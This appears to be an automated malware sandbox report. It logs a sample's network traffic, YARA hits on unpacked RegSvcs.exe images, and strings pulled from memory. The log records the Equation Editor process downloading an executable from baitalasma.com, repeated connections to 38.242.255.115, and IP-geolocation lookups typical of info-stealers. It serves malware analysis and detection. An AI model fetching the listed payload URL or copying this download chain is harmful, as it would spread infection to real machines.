Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443

Networking

Source: Yara match File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: Joe Sandbox View IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Source: Joe Sandbox View ASN Name: NATIXISUS NATIXISUS
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_035306AA URLDownloadToFileW, 2_2_035306AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm
Source: global traffic HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: baitalasma.com
Source: global traffic DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic DNS traffic detected: DNS query: reallyfreegeoip.org
Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://baitalasma.com/T76434567000.exej
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.887544334.0000000000922000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A58000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.888283169.0000000005B20000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: EQNEDT32.EXE, 00000002.00000002.526557448.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.460593789.00000000005BD000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526397052.00000000005C4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.526433998.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.000000000062A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
